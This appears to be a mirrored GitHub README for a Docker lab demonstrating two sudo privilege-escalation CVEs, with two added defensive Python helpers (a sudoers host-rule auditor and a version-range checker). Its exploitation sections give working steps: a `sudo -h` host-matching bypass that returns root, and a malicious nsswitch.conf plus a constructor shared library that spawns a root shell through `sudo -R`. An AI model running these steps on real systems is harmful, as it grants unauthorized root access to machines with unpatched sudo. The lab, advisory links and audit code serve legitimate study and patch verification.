Related vulnerabilities
Description
Docker PoC for CVE-2025-32462 & CVE-2025-32463 (sudo), based on Stratascale CRU research.
Introduction
# CVE-2025-32462 & CVE-2025-32463 – PoC Lab
This is a container-based lab and PoC for the following vulnerabilities in `sudo`:
- **CVE-2025-32462** – `sudo -h` host matching logic bypass
- **CVE-2025-32463** – `sudo -R` chroot NSS library escape
> 🔒 For educational purposes only. Do not use on systems you don’t own or have permission to test.
---
## 🔬 Original Research
- Blog Post for CVE-2025-32462: [sudo host alias privilege escalation](https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host)
- Blog Post for CVE-2025-32463: [sudo chroot NSS bypass](https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot)
### 🧠 Research Credit
- **Rich Mirch**
Stratascale Cyber Research Unit (CRU)
[@Stratascale](https://www.stratascale.com)
---
## 🧪 Lab Setup (Docker)
### 🔧 Dockerfile
```dockerfile
FROM ubuntu:24.04
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
    pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*
WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && make && make install
RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd
USER pwn
WORKDIR /home/pwn
CMD ["/bin/bash"]
```
---
### 🚀 Build & Run
```bash
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null
```
> Extra setup for `CVE-2025-32462` (adds the host-restricted sudoers rules that the host-matching bypass relies on)
```bash
docker exec -u root -it lowpriv bash
# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers
```
---
# Manual Exploitation
## CVE-2025-32462
> Normal Operation
```bash
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required
```
> Exploitation
```bash
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)
pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local
```
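The rules appended in the setup step are the kind a defender should be able to enumerate quickly: on an unpatched sudo, any rule whose host list is narrower than `ALL` is one that a caller-supplied `-h` hostname can be used to satisfy, so those rules need review and a re-test after upgrading. The Python below is an added audit helper, not part of this repository or of the Stratascale research: it parses a sudoers file, resolves `Host_Alias` definitions and lists every user specification whose host list is not a bare `ALL`. `SAMPLE_SUDOERS` is constructed to mirror the lab configuration (with two extra rules to exercise the parser); `HostRule`, `host_restricted_rules` and the other names are chosen here. Line continuations and `#include` directives are not handled.

```python
import re
from dataclasses import dataclass

# Constructed sample sudoers text mirroring the lab's rules (plus a few extra
# lines to exercise the parser); not copied from any real host.
SAMPLE_SUDOERS = """\
# lab rules appended by the setup step above
Defaults env_reset
Host_Alias HIGH = highpriv.test.local
Host_Alias LOW = lowpriv.test.local
Host_Alias DMZ = web1.example.test, web2.example.test
root ALL=(ALL:ALL) ALL
pwn HIGH,!LOW = NOPASSWD:ALL
deploy DMZ = (root) /usr/bin/systemctl restart app
auditor ALL = (root) /usr/bin/journalctl
"""

# Line kinds that are not user specifications and are skipped by the audit.
NON_RULE_PREFIXES = ("Defaults", "Host_Alias", "User_Alias", "Cmnd_Alias", "Runas_Alias")


@dataclass
class HostRule:
    user: str          # user or %group the rule applies to
    hosts: list        # host list exactly as written, e.g. ["HIGH", "!LOW"]
    expanded: list     # aliases resolved to host names, "!" prefix preserved
    line: str          # the original sudoers line, for reporting


def parse_host_aliases(text):
    """Collect Host_Alias definitions: alias name -> list of member host names."""
    aliases = {}
    for line in text.splitlines():
        m = re.match(r"^\s*Host_Alias\s+(\w+)\s*=\s*(.+)$", line)
        if m:
            aliases[m.group(1)] = [h.strip() for h in m.group(2).split(",")]
    return aliases


def expand_host(entry, aliases):
    """Resolve one host-list entry; a leading '!' (negation) is kept on each member."""
    negated = entry.startswith("!")
    name = entry.lstrip("!")
    members = aliases.get(name, [name])
    return [("!" if negated else "") + h for h in members]


def host_restricted_rules(text):
    """Return every user specification whose host list is not a bare ALL.

    On sudo builds affected by CVE-2025-32462 these are the rules that a
    caller-chosen '-h' hostname can satisfy, so they are the ones to review.
    """
    aliases = parse_host_aliases(text)
    findings = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" not in s:
            continue
        if s.startswith(NON_RULE_PREFIXES):
            continue
        head = s.split("=", 1)[0].strip()        # e.g. "pwn HIGH,!LOW"
        parts = head.split(None, 1)
        if len(parts) != 2:
            continue                              # not a user specification
        user, hostspec = parts
        hosts = [h.strip() for h in hostspec.split(",")]
        if hosts == ["ALL"]:
            continue
        expanded = [h for entry in hosts for h in expand_host(entry, aliases)]
        findings.append(HostRule(user, hosts, expanded, s))
    return findings


def report(text):
    """Human-readable summary, one line per host-restricted rule."""
    return "\n".join(
        f"{r.user}: hosts {r.hosts} -> {r.expanded}   [{r.line}]"
        for r in host_restricted_rules(text)
    )


if __name__ == "__main__":
    # To audit a real file: report(open("/etc/sudoers").read()) as root.
    print(report(SAMPLE_SUDOERS) or "no host-restricted rules found")
```

Run against the lab sample it lists `pwn` (hosts `HIGH,!LOW`, resolving to `highpriv.test.local` and `!lowpriv.test.local`) and `deploy` (the `DMZ` alias), and nothing for the `ALL` rules. The point of printing the expanded list is that a negated host such as `!LOW` is exactly the restriction the `-h` bypass in the section above steps around.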
## CVE-2025-32463
> Normal Operation
```bash
pwn@lowpriv:~$ sudo id
Password:
pwn is not allowed to run sudo on lowpriv.
```
> Preparation
```bash
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc
# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf
# Step 3: Create directory for the malicious NSS library
mkdir libnss_
# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/
# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void GIVEMEROOT(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
EOF
# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c
# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT
root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
```
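Both issues in this lab are fixed by upgrading, so the first thing a practitioner wants is a quick way to tell whether a given build's version number falls inside either published range. The Python below is an added check, not part of this repository or of the Stratascale research: it parses the `sudo --version` banner into a comparable tuple (handling the `pN` patch-level suffix) and reports which of the two CVEs the number falls inside. The affected ranges in `ADVISORIES` are assumptions taken from the upstream sudo advisories rather than from this README, so verify them there; the lab's own `1.9.16p2` build is the sample input, and `version_tuple`, `affected_cves` and `local_sudo_banner` are names chosen here.

```python
import re
import subprocess

# Version tuples are (major, minor, patch, plevel); "1.9.16p2" -> (1, 9, 16, 2).
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Affected ranges per CVE as [first affected, first fixed). These numbers are
# ASSUMED from the upstream sudo advisories, not taken from this README;
# re-check them against the advisory before relying on them.
ADVISORIES = {
    "CVE-2025-32462": {"first": (1, 8, 8, 0), "fixed": (1, 9, 17, 1)},
    "CVE-2025-32463": {"first": (1, 9, 14, 0), "fixed": (1, 9, 17, 1)},
}


def version_tuple(text):
    """Parse a bare version ("1.9.16p2") or a banner ("Sudo version 1.9.16p2")."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def affected_cves(text):
    """CVE ids whose assumed range contains the given version (by number only)."""
    v = version_tuple(text)
    return [cve for cve, r in ADVISORIES.items() if r["first"] <= v < r["fixed"]]


def local_sudo_banner():
    """First line of `sudo --version` on this host, or '' if sudo is not installed."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return ""
    return out.splitlines()[0] if out else ""


if __name__ == "__main__":
    # Fall back to the lab's source-built version when run somewhere without sudo.
    banner = local_sudo_banner() or "Sudo version 1.9.16p2"
    hits = affected_cves(banner)
    print(banner)
    print("affected by version number:", ", ".join(hits) if hits else "none")
    print("caveat: distribution packages often backport the fix without changing "
          "the version string; confirm against the package changelog.")
```

The check is deliberately conservative about what it claims: the lab's source-built `1.9.16p2` matches both ranges and a source-built fixed release matches neither, but a distribution package can carry the fix under an older version string, so a banner hit is a prompt to read the package changelog (or test the behaviour), not a verdict on its own.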
---
# Disclaimer
> This PoC is for educational and authorized research only.
---
# ✍️ Author
PoC lab and Docker environment by [MAAYTHM](https://github.com/MAAYTHM).
Research credit: Rich Mirch – Stratascale CRU
File snapshot
[4.0K] /data/pocs/1381bcc75e2f79ad0fe63859da54363941274bd9
├── [ 848] auto_cve_2025_32463.sh
├── [ 583] Dockerfile
├── [1.0K] LICENSE
└── [3.7K] README.md
0 directories, 4 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source is no longer available or cannot be reached, e-mail f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.